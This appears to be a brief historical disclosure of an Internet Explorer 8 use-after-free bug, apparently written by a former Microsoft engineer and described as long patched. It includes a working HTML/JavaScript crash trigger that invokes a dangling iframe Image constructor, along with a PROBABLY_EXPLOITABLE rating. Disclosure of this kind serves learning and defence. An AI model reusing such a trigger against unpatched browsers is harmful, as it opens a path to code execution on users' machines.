Saving a reference to an iframe’s Image constructor, reloading the iframe (which destroys the original context), and then calling new cachedImage() from the parent crashes IE8 with a PROBABLY_EXPLOITABLE rating from the !exploitable crash analyzer.

<input type="button" onclick="crashMe()" value="Crash Me">
<iframe width="100" height="30"></iframe>

<script language="JavaScript">
function crashMe()
{
    // Run in the iframe's context: stash its Image constructor on the
    // top-level window, then reload the iframe so that context is torn down.
    window[0].execScript("top.cachedImage = Image;location.reload();");
    // Back in the parent, wait for the reload to destroy the original
    // context and then invoke the now-dangling constructor.
    setTimeout("new cachedImage();", 100);
}
</script>

The script executed inside the iframe saves Image to top.cachedImage and reloads the frame; the parent waits 100ms and then instantiates the cached constructor, which now refers to an object from a context that no longer exists. The !exploitable analysis classified this as PROBABLY_EXPLOITABLE — the data from the faulting address controls code flow (hash 0x1006131a.0x61240550). On IE7 the same sequence produces an access-denied error rather than a crash. Tested on XP and Windows 7 with IE8.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.